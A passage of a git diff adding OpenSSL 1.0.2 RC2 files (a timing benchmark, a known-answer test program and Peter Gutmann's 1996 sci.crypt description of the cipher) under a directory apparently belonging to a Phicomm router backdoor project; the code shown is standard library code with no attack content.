+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+/* 11-Sep-92 Andrew Daviel   Support for Silicon Graphics IRIX added */
+/* 06-Apr-92 Luke Brennan    Support for VMS and add extra signal calls */
+
+#if !defined(OPENSSL_SYS_MSDOS) && (!defined(OPENSSL_SYS_VMS) || defined(__DECC)) && !defined(OPENSSL_SYS_MACOSX)
+# define TIMES
+#endif
+
+#include <stdio.h>
+
+#include <openssl/e_os2.h>
+#include OPENSSL_UNISTD_IO
+OPENSSL_DECLARE_EXIT
+#ifndef OPENSSL_SYS_NETWARE
+# include <signal.h>
+#endif
+#ifndef _IRIX
+# include <time.h>
+#endif
+#ifdef TIMES
+# include <sys/types.h>
+# include <sys/times.h>
+#endif
+    /*
+     * Depending on the VMS version, the tms structure is perhaps defined.
+     * The __TMS macro will show if it was.  If it wasn't defined, we should
+     * undefine TIMES, since that tells the rest of the program how things
+     * should be handled.  -- Richard Levitte
+     */
+#if defined(OPENSSL_SYS_VMS_DECC) && !defined(__TMS)
+# undef TIMES
+#endif
+#ifndef TIMES
+# include <sys/timeb.h>
+#endif
+#if defined(sun) || defined(__ultrix)
+# define _POSIX_SOURCE
+# include <limits.h>
+# include <sys/param.h>
+#endif
+#include <openssl/rc2.h>
+/* The following if from times(3) man page.  It may need to be changed */
+#ifndef HZ
+# ifndef CLK_TCK
+#  define HZ      100.0
+# else                          /* CLK_TCK */
+#  define HZ ((double)CLK_TCK)
+# endif                         /* CLK_TCK */
+#endif                          /* HZ */
+#define BUFSIZE ((long)1024)
+long run = 0;
+
+double Time_F(int s);
+#ifdef SIGALRM
+# if defined(__STDC__) || defined(sgi) || defined(_AIX)
+#  define SIGRETTYPE void
+# else
+#  define SIGRETTYPE int
+# endif
+
+SIGRETTYPE sig_done(int sig);
+SIGRETTYPE sig_done(int sig)
+{
+    signal(SIGALRM, sig_done);
+    run = 0;
+# ifdef LINT
+    sig = sig;
+# endif
+}
+#endif
+
+#define START   0
+#define STOP    1
+
+double Time_F(int s)
+{
+    double ret;
+#ifdef TIMES
+    static struct tms tstart, tend;
+
+    if (s == START) {
+        times(&tstart);
+        return (0);
+    } else {
+        times(&tend);
+        ret = ((double)(tend.tms_utime - tstart.tms_utime)) / HZ;
+        return ((ret == 0.0) ? 1e-6 : ret);
+    }
+#else                           /* !times() */
+    static struct timeb tstart, tend;
+    long i;
+
+    if (s == START) {
+        ftime(&tstart);
+        return (0);
+    } else {
+        ftime(&tend);
+        i = (long)tend.millitm - (long)tstart.millitm;
+        ret = ((double)(tend.time - tstart.time)) + ((double)i) / 1e3;
+        return ((ret == 0.0) ? 1e-6 : ret);
+    }
+#endif
+}
+
+int main(int argc, char **argv)
+{
+    long count;
+    static unsigned char buf[BUFSIZE];
+    static unsigned char key[] = {
+        0x12, 0x34, 0x56, 0x78, 0x9a, 0xbc, 0xde, 0xf0,
+        0xfe, 0xdc, 0xba, 0x98, 0x76, 0x54, 0x32, 0x10,
+    };
+    RC2_KEY sch;
+    double a, b, c, d;
+#ifndef SIGALRM
+    long ca, cb, cc;
+#endif
+
+#ifndef TIMES
+    printf("To get the most accurate results, try to run this\n");
+    printf("program when this computer is idle.\n");
+#endif
+
+#ifndef SIGALRM
+    printf("First we calculate the approximate speed ...\n");
+    RC2_set_key(&sch, 16, key, 128);
+    count = 10;
+    do {
+        long i;
+        unsigned long data[2];
+
+        count *= 2;
+        Time_F(START);
+        for (i = count; i; i--)
+            RC2_encrypt(data, &sch);
+        d = Time_F(STOP);
+    } while (d < 3.0);
+    ca = count / 512;
+    cb = count;
+    cc = count * 8 / BUFSIZE + 1;
+    printf("Doing RC2_set_key %ld times\n", ca);
+# define COND(d) (count != (d))
+# define COUNT(d) (d)
+#else
+# define COND(c) (run)
+# define COUNT(d) (count)
+    signal(SIGALRM, sig_done);
+    printf("Doing RC2_set_key for 10 seconds\n");
+    alarm(10);
+#endif
+
+    Time_F(START);
+    for (count = 0, run = 1; COND(ca); count += 4) {
+        RC2_set_key(&sch, 16, key, 128);
+        RC2_set_key(&sch, 16, key, 128);
+        RC2_set_key(&sch, 16, key, 128);
+        RC2_set_key(&sch, 16, key, 128);
+    }
+    d = Time_F(STOP);
+    printf("%ld RC2_set_key's in %.2f seconds\n", count, d);
+    a = ((double)COUNT(ca)) / d;
+
+#ifdef SIGALRM
+    printf("Doing RC2_encrypt's for 10 seconds\n");
+    alarm(10);
+#else
+    printf("Doing RC2_encrypt %ld times\n", cb);
+#endif
+    Time_F(START);
+    for (count = 0, run = 1; COND(cb); count += 4) {
+        unsigned long data[2];
+
+        RC2_encrypt(data, &sch);
+        RC2_encrypt(data, &sch);
+        RC2_encrypt(data, &sch);
+        RC2_encrypt(data, &sch);
+    }
+    d = Time_F(STOP);
+    printf("%ld RC2_encrypt's in %.2f second\n", count, d);
+    b = ((double)COUNT(cb) * 8) / d;
+
+#ifdef SIGALRM
+    printf("Doing RC2_cbc_encrypt on %ld byte blocks for 10 seconds\n",
+           BUFSIZE);
+    alarm(10);
+#else
+    printf("Doing RC2_cbc_encrypt %ld times on %ld byte blocks\n", cc,
+           BUFSIZE);
+#endif
+    Time_F(START);
+    for (count = 0, run = 1; COND(cc); count++)
+        RC2_cbc_encrypt(buf, buf, BUFSIZE, &sch, &(key[0]), RC2_ENCRYPT);
+    d = Time_F(STOP);
+    printf("%ld RC2_cbc_encrypt's of %ld byte blocks in %.2f second\n",
+           count, BUFSIZE, d);
+    c = ((double)COUNT(cc) * BUFSIZE) / d;
+
+    printf("RC2 set_key       per sec = %12.2f (%9.3fuS)\n", a, 1.0e6 / a);
+    printf("RC2 raw ecb bytes per sec = %12.2f (%9.3fuS)\n", b, 8.0e6 / b);
+    printf("RC2 cbc     bytes per sec = %12.2f (%9.3fuS)\n", c, 8.0e6 / c);
+    exit(0);
+#if defined(LINT) || defined(OPENSSL_SYS_MSDOS)
+    return (0);
+#endif
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rc2/rc2test.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rc2/rc2test.c
new file mode 100644
index 0000000..e61df34
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rc2/rc2test.c
@@ -0,0 +1,274 @@
+/* crypto/rc2/rc2test.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+/*
+ * This has been a quickly hacked 'ideatest.c'.  When I add tests for other
+ * RC2 modes, more of the code will be uncommented.
+ */
+
+#include <stdio.h>
+#include <string.h>
+#include <stdlib.h>
+
+#include "../e_os.h"
+
+#ifdef OPENSSL_NO_RC2
+int main(int argc, char *argv[])
+{
+    printf("No RC2 support\n");
+    return (0);
+}
+#else
+# include <openssl/rc2.h>
+
+static unsigned char RC2key[4][16] = {
+    {0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+     0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00},
+    {0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+     0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01},
+    {0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+     0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00},
+    {0x00, 0x01, 0x02, 0x03, 0x04, 0x05, 0x06, 0x07,
+     0x08, 0x09, 0x0A, 0x0B, 0x0C, 0x0D, 0x0E, 0x0F},
+};
+
+static unsigned char RC2plain[4][8] = {
+    {0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00},
+    {0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00},
+    {0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF},
+    {0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00},
+};
+
+static unsigned char RC2cipher[4][8] = {
+    {0x1C, 0x19, 0x8A, 0x83, 0x8D, 0xF0, 0x28, 0xB7},
+    {0x21, 0x82, 0x9C, 0x78, 0xA9, 0xF9, 0xC0, 0x74},
+    {0x13, 0xDB, 0x35, 0x17, 0xD3, 0x21, 0x86, 0x9E},
+    {0x50, 0xDC, 0x01, 0x62, 0xBD, 0x75, 0x7F, 0x31},
+};
+
+/************/
+# ifdef undef
+unsigned char k[16] = {
+    0x00, 0x01, 0x00, 0x02, 0x00, 0x03, 0x00, 0x04,
+    0x00, 0x05, 0x00, 0x06, 0x00, 0x07, 0x00, 0x08
+};
+
+unsigned char in[8] = { 0x00, 0x00, 0x00, 0x01, 0x00, 0x02, 0x00, 0x03 };
+unsigned char c[8] = { 0x11, 0xFB, 0xED, 0x2B, 0x01, 0x98, 0x6D, 0xE5 };
+
+unsigned char out[80];
+
+char *text = "Hello to all people out there";
+
+static unsigned char cfb_key[16] = {
+    0xe1, 0xf0, 0xc3, 0xd2, 0xa5, 0xb4, 0x87, 0x96,
+    0x69, 0x78, 0x4b, 0x5a, 0x2d, 0x3c, 0x0f, 0x1e,
+};
+static unsigned char cfb_iv[80] =
+    { 0x34, 0x12, 0x78, 0x56, 0xab, 0x90, 0xef, 0xcd };
+static unsigned char cfb_buf1[40], cfb_buf2[40], cfb_tmp[8];
+#  define CFB_TEST_SIZE 24
+static unsigned char plain[CFB_TEST_SIZE] = {
+    0x4e, 0x6f, 0x77, 0x20, 0x69, 0x73,
+    0x20, 0x74, 0x68, 0x65, 0x20, 0x74,
+    0x69, 0x6d, 0x65, 0x20, 0x66, 0x6f,
+    0x72, 0x20, 0x61, 0x6c, 0x6c, 0x20
+};
+
+static unsigned char cfb_cipher64[CFB_TEST_SIZE] = {
+    0x59, 0xD8, 0xE2, 0x65, 0x00, 0x58, 0x6C, 0x3F,
+    0x2C, 0x17, 0x25, 0xD0, 0x1A, 0x38, 0xB7, 0x2A,
+    0x39, 0x61, 0x37, 0xDC, 0x79, 0xFB, 0x9F, 0x45
+/*- 0xF9,0x78,0x32,0xB5,0x42,0x1A,0x6B,0x38,
+    0x9A,0x44,0xD6,0x04,0x19,0x43,0xC4,0xD9,
+    0x3D,0x1E,0xAE,0x47,0xFC,0xCF,0x29,0x0B,*/
+};
+
+/*
+ * static int cfb64_test(unsigned char *cfb_cipher);
+ */
+static char *pt(unsigned char *p);
+# endif
+
+int main(int argc, char *argv[])
+{
+    int i, n, err = 0;
+    RC2_KEY key;
+    unsigned char buf[8], buf2[8];
+
+    for (n = 0; n < 4; n++) {
+        RC2_set_key(&key, 16, &(RC2key[n][0]), 0 /* or 1024 */ );
+
+        RC2_ecb_encrypt(&(RC2plain[n][0]), buf, &key, RC2_ENCRYPT);
+        if (memcmp(&(RC2cipher[n][0]), buf, 8) != 0) {
+            printf("ecb rc2 error encrypting\n");
+            printf("got     :");
+            for (i = 0; i < 8; i++)
+                printf("%02X ", buf[i]);
+            printf("\n");
+            printf("expected:");
+            for (i = 0; i < 8; i++)
+                printf("%02X ", RC2cipher[n][i]);
+            err = 20;
+            printf("\n");
+        }
+
+        RC2_ecb_encrypt(buf, buf2, &key, RC2_DECRYPT);
+        if (memcmp(&(RC2plain[n][0]), buf2, 8) != 0) {
+            printf("ecb RC2 error decrypting\n");
+            printf("got     :");
+            for (i = 0; i < 8; i++)
+                printf("%02X ", buf[i]);
+            printf("\n");
+            printf("expected:");
+            for (i = 0; i < 8; i++)
+                printf("%02X ", RC2plain[n][i]);
+            printf("\n");
+            err = 3;
+        }
+    }
+
+    if (err == 0)
+        printf("ecb RC2 ok\n");
+# ifdef undef
+    memcpy(iv, k, 8);
+    idea_cbc_encrypt((unsigned char *)text, out, strlen(text) + 1, &key, iv,
+                     1);
+    memcpy(iv, k, 8);
+    idea_cbc_encrypt(out, out, 8, &dkey, iv, 0);
+    idea_cbc_encrypt(&(out[8]), &(out[8]), strlen(text) + 1 - 8, &dkey, iv,
+                     0);
+    if (memcmp(text, out, strlen(text) + 1) != 0) {
+        printf("cbc idea bad\n");
+        err = 4;
+    } else
+        printf("cbc idea ok\n");
+
+    printf("cfb64 idea ");
+    if (cfb64_test(cfb_cipher64)) {
+        printf("bad\n");
+        err = 5;
+    } else
+        printf("ok\n");
+# endif
+
+# ifdef OPENSSL_SYS_NETWARE
+    if (err)
+        printf("ERROR: %d\n", err);
+# endif
+    EXIT(err);
+    return (err);
+}
+
+# ifdef undef
+static int cfb64_test(unsigned char *cfb_cipher)
+{
+    IDEA_KEY_SCHEDULE eks, dks;
+    int err = 0, i, n;
+
+    idea_set_encrypt_key(cfb_key, &eks);
+    idea_set_decrypt_key(&eks, &dks);
+    memcpy(cfb_tmp, cfb_iv, 8);
+    n = 0;
+    idea_cfb64_encrypt(plain, cfb_buf1, (long)12, &eks,
+                       cfb_tmp, &n, IDEA_ENCRYPT);
+    idea_cfb64_encrypt(&(plain[12]), &(cfb_buf1[12]),
+                       (long)CFB_TEST_SIZE - 12, &eks,
+                       cfb_tmp, &n, IDEA_ENCRYPT);
+    if (memcmp(cfb_cipher, cfb_buf1, CFB_TEST_SIZE) != 0) {
+        err = 1;
+        printf("idea_cfb64_encrypt encrypt error\n");
+        for (i = 0; i < CFB_TEST_SIZE; i += 8)
+            printf("%s\n", pt(&(cfb_buf1[i])));
+    }
+    memcpy(cfb_tmp, cfb_iv, 8);
+    n = 0;
+    idea_cfb64_encrypt(cfb_buf1, cfb_buf2, (long)17, &eks,
+                       cfb_tmp, &n, IDEA_DECRYPT);
+    idea_cfb64_encrypt(&(cfb_buf1[17]), &(cfb_buf2[17]),
+                       (long)CFB_TEST_SIZE - 17, &dks,
+                       cfb_tmp, &n, IDEA_DECRYPT);
+    if (memcmp(plain, cfb_buf2, CFB_TEST_SIZE) != 0) {
+        err = 1;
+        printf("idea_cfb_encrypt decrypt error\n");
+        for (i = 0; i < 24; i += 8)
+            printf("%s\n", pt(&(cfb_buf2[i])));
+    }
+    return (err);
+}
+
+static char *pt(unsigned char *p)
+{
+    static char bufs[10][20];
+    static int bnum = 0;
+    char *ret;
+    int i;
+    static char *f = "0123456789ABCDEF";
+
+    ret = &(bufs[bnum++][0]);
+    bnum %= 10;
+    for (i = 0; i < 8; i++) {
+        ret[i * 2] = f[(p[i] >> 4) & 0xf];
+        ret[i * 2 + 1] = f[p[i] & 0xf];
+    }
+    ret[16] = '\0';
+    return (ret);
+}
+
+# endif
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rc2/rrc2.doc b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rc2/rrc2.doc
new file mode 100644
index 0000000..f93ee00
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rc2/rrc2.doc
@@ -0,0 +1,219 @@
+>From cygnus.mincom.oz.au!minbne.mincom.oz.au!bunyip.cc.uq.oz.au!munnari.OZ.AU!comp.vuw.ac.nz!waikato!auckland.ac.nz!news Mon Feb 12 18:48:17 EST 1996
+Article 23601 of sci.crypt:
+Path: cygnus.mincom.oz.au!minbne.mincom.oz.au!bunyip.cc.uq.oz.au!munnari.OZ.AU!comp.vuw.ac.nz!waikato!auckland.ac.nz!news
+>From: pgut01@cs.auckland.ac.nz (Peter Gutmann)
+Newsgroups: sci.crypt
+Subject: Specification for Ron Rivests Cipher No.2
+Date: 11 Feb 1996 06:45:03 GMT
+Organization: University of Auckland
+Lines: 203
+Sender: pgut01@cs.auckland.ac.nz (Peter Gutmann)
+Message-ID: <4fk39f$f70@net.auckland.ac.nz>
+NNTP-Posting-Host: cs26.cs.auckland.ac.nz
+X-Newsreader: NN version 6.5.0 #3 (NOV)
+
+
+
+
+                           Ron Rivest's Cipher No.2
+                           ------------------------
+ 
+Ron Rivest's Cipher No.2 (hereafter referred to as RRC.2, other people may
+refer to it by other names) is word oriented, operating on a block of 64 bits
+divided into four 16-bit words, with a key table of 64 words.  All data units
+are little-endian.  This functional description of the algorithm is based in
+the paper "The RC5 Encryption Algorithm" (RC5 is a trademark of RSADSI), using
+the same general layout, terminology, and pseudocode style.
+ 
+ 
+Notation and RRC.2 Primitive Operations
+ 
+RRC.2 uses the following primitive operations:
+ 
+1. Two's-complement addition of words, denoted by "+".  The inverse operation,
+   subtraction, is denoted by "-".
+2. Bitwise exclusive OR, denoted by "^".
+3. Bitwise AND, denoted by "&".
+4. Bitwise NOT, denoted by "~".
+5. A left-rotation of words; the rotation of word x left by y is denoted
+   x <<< y.  The inverse operation, right-rotation, is denoted x >>> y.
+ 
+These operations are directly and efficiently supported by most processors.
+ 
+ 
+The RRC.2 Algorithm
+ 
+RRC.2 consists of three components, a *key expansion* algorithm, an
+*encryption* algorithm, and a *decryption* algorithm.
+ 
+ 
+Key Expansion
+ 
+The purpose of the key-expansion routine is to expand the user's key K to fill
+the expanded key array S, so S resembles an array of random binary words
+determined by the user's secret key K.
+ 
+Initialising the S-box
+ 
+RRC.2 uses a single 256-byte S-box derived from the ciphertext contents of
+Beale Cipher No.1 XOR'd with a one-time pad.  The Beale Ciphers predate modern
+cryptography by enough time that there should be no concerns about trapdoors
+hidden in the data.  They have been published widely, and the S-box can be
+easily recreated from the one-time pad values and the Beale Cipher data taken
+from a standard source.  To initialise the S-box:
+ 
+  for i = 0 to 255 do
+    sBox[ i ] = ( beale[ i ] mod 256 ) ^ pad[ i ]
+ 
+The contents of Beale Cipher No.1 and the necessary one-time pad are given as
+an appendix at the end of this document.  For efficiency, implementors may wish
+to skip the Beale Cipher expansion and store the sBox table directly.
+ 
+Expanding the Secret Key to 128 Bytes
+ 
+The secret key is first expanded to fill 128 bytes (64 words).  The expansion
+consists of taking the sum of the first and last bytes in the user key, looking
+up the sum (modulo 256) in the S-box, and appending the result to the key.  The
+operation is repeated with the second byte and new last byte of the key until
+all 128 bytes have been generated.  Note that the following pseudocode treats
+the S array as an array of 128 bytes rather than 64 words.
+ 
+  for j = 0 to length-1 do
+    S[ j ] = K[ j ]
+  for j = length to 127 do
+    s[ j ] = sBox[ ( S[ j-length ] + S[ j-1 ] ) mod 256 ];
+ 
+At this point it is possible to perform a truncation of the effective key
+length to ease the creation of espionage-enabled software products.  However
+since the author cannot conceive why anyone would want to do this, it will not
+be considered further.
+ 
+The final phase of the key expansion involves replacing the first byte of S
+with the entry selected from the S-box:
+ 
+  S[ 0 ] = sBox[ S[ 0 ] ]
+ 
+ 
+Encryption
+ 
+The cipher has 16 full rounds, each divided into 4 subrounds.  Two of the full
+rounds perform an additional transformation on the data.  Note that the
+following pseudocode treats the S array as an array of 64 words rather than 128
+bytes.
+ 
+  for i = 0 to 15 do
+    j = i * 4;
+    word0 = ( word0 + ( word1 & ~word3 ) + ( word2 & word3 ) + S[ j+0 ] ) <<< 1
+    word1 = ( word1 + ( word2 & ~word0 ) + ( word3 & word0 ) + S[ j+1 ] ) <<< 2
+    word2 = ( word2 + ( word3 & ~word1 ) + ( word0 & word1 ) + S[ j+2 ] ) <<< 3
+    word3 = ( word3 + ( word0 & ~word2 ) + ( word1 & word2 ) + S[ j+3 ] ) <<< 5
+ 
+In addition the fifth and eleventh rounds add the contents of the S-box indexed
+by one of the data words to another of the data words following the four
+subrounds as follows:
+ 
+    word0 = word0 + S[ word3 & 63 ];
+    word1 = word1 + S[ word0 & 63 ];
+    word2 = word2 + S[ word1 & 63 ];
+    word3 = word3 + S[ word2 & 63 ];
+ 
+ 
+Decryption
+ 
+The decryption operation is simply the inverse of the encryption operation.
+Note that the following pseudocode treats the S array as an array of 64 words
+rather than 128 bytes.
+ 
+  for i = 15 downto 0 do
+    j = i * 4;
+    word3 = ( word3 >>> 5 ) - ( word0 & ~word2 ) - ( word1 & word2 ) - S[ j+3 ]
+    word2 = ( word2 >>> 3 ) - ( word3 & ~word1 ) - ( word0 & word1 ) - S[ j+2 ]
+    word1 = ( word1 >>> 2 ) - ( word2 & ~word0 ) - ( word3 & word0 ) - S[ j+1 ]
+    word0 = ( word0 >>> 1 ) - ( word1 & ~word3 ) - ( word2 & word3 ) - S[ j+0 ]
+ 
+In addition the fifth and eleventh rounds subtract the contents of the S-box
+indexed by one of the data words from another one of the data words following
+the four subrounds as follows:
+ 
+    word3 = word3 - S[ word2 & 63 ]
+    word2 = word2 - S[ word1 & 63 ]
+    word1 = word1 - S[ word0 & 63 ]
+    word0 = word0 - S[ word3 & 63 ]
+ 
+ 
+Test Vectors
+ 
+The following test vectors may be used to test the correctness of an RRC.2
+implementation:
+ 
+  Key:      0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+            0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00
+  Plain:    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00
+  Cipher:   0x1C, 0x19, 0x8A, 0x83, 0x8D, 0xF0, 0x28, 0xB7
+ 
+  Key:      0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+            0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01
+  Plain:    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00
+  Cipher:   0x21, 0x82, 0x9C, 0x78, 0xA9, 0xF9, 0xC0, 0x74
+ 
+  Key:      0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+            0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00
+  Plain:    0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF
+  Cipher:   0x13, 0xDB, 0x35, 0x17, 0xD3, 0x21, 0x86, 0x9E
+ 
+  Key:      0x00, 0x01, 0x02, 0x03, 0x04, 0x05, 0x06, 0x07,
+            0x08, 0x09, 0x0A, 0x0B, 0x0C, 0x0D, 0x0E, 0x0F
+  Plain:    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00
+  Cipher:   0x50, 0xDC, 0x01, 0x62, 0xBD, 0x75, 0x7F, 0x31
+ 
+ 
+Appendix: Beale Cipher No.1, "The Locality of the Vault", and One-time Pad for
+          Creating the S-Box
+ 
+Beale Cipher No.1.
+ 
+  71, 194,  38,1701,  89,  76,  11,  83,1629,  48,  94,  63, 132,  16, 111,  95,
+  84, 341, 975,  14,  40,  64,  27,  81, 139, 213,  63,  90,1120,   8,  15,   3,
+ 126,2018,  40,  74, 758, 485, 604, 230, 436, 664, 582, 150, 251, 284, 308, 231,
+ 124, 211, 486, 225, 401, 370,  11, 101, 305, 139, 189,  17,  33,  88, 208, 193,
+ 145,   1,  94,  73, 416, 918, 263,  28, 500, 538, 356, 117, 136, 219,  27, 176,
+ 130,  10, 460,  25, 485,  18, 436,  65,  84, 200, 283, 118, 320, 138,  36, 416,
+ 280,  15,  71, 224, 961,  44,  16, 401,  39,  88,  61, 304,  12,  21,  24, 283,
+ 134,  92,  63, 246, 486, 682,   7, 219, 184, 360, 780,  18,  64, 463, 474, 131,
+ 160,  79,  73, 440,  95,  18,  64, 581,  34,  69, 128, 367, 460,  17,  81,  12,
+ 103, 820,  62, 110,  97, 103, 862,  70,  60,1317, 471, 540, 208, 121, 890, 346,
+  36, 150,  59, 568, 614,  13, 120,  63, 219, 812,2160,1780,  99,  35,  18,  21,
+ 136, 872,  15,  28, 170,  88,   4,  30,  44, 112,  18, 147, 436, 195, 320,  37,
+ 122, 113,   6, 140,   8, 120, 305,  42,  58, 461,  44, 106, 301,  13, 408, 680,
+  93,  86, 116, 530,  82, 568,   9, 102,  38, 416,  89,  71, 216, 728, 965, 818,
+   2,  38, 121, 195,  14, 326, 148, 234,  18,  55, 131, 234, 361, 824,   5,  81,
+ 623,  48, 961,  19,  26,  33,  10,1101, 365,  92,  88, 181, 275, 346, 201, 206
+ 
+One-time Pad.
+ 
+ 158, 186, 223,  97,  64, 145, 190, 190, 117, 217, 163,  70, 206, 176, 183, 194,
+ 146,  43, 248, 141,   3,  54,  72, 223, 233, 153,  91, 210,  36, 131, 244, 161,
+ 105, 120, 113, 191, 113,  86,  19, 245, 213, 221,  43,  27, 242, 157,  73, 213,
+ 193,  92, 166,  10,  23, 197, 112, 110, 193,  30, 156,  51, 125,  51, 158,  67,
+ 197, 215,  59, 218, 110, 246, 181,   0, 135,  76, 164,  97,  47,  87, 234, 108,
+ 144, 127,   6,   6, 222, 172,  80, 144,  22, 245, 207,  70, 227, 182, 146, 134,
+ 119, 176,  73,  58, 135,  69,  23, 198,   0, 170,  32, 171, 176, 129,  91,  24,
+ 126,  77, 248,   0, 118,  69,  57,  60, 190, 171, 217,  61, 136, 169, 196,  84,
+ 168, 167, 163, 102, 223,  64, 174, 178, 166, 239, 242, 195, 249,  92,  59,  38,
+ 241,  46, 236,  31,  59, 114,  23,  50, 119, 186,   7,  66, 212,  97, 222, 182,
+ 230, 118, 122,  86, 105,  92, 179, 243, 255, 189, 223, 164, 194, 215,  98,  44,
+  17,  20,  53, 153, 137, 224, 176, 100, 208, 114,  36, 200, 145, 150, 215,  20,
+  87,  44, 252,  20, 235, 242, 163, 132,  63,  18,   5, 122,  74,  97,  34,  97,
+ 142,  86, 146, 221, 179, 166, 161,  74,  69, 182,  88, 120, 128,  58,  76, 155,
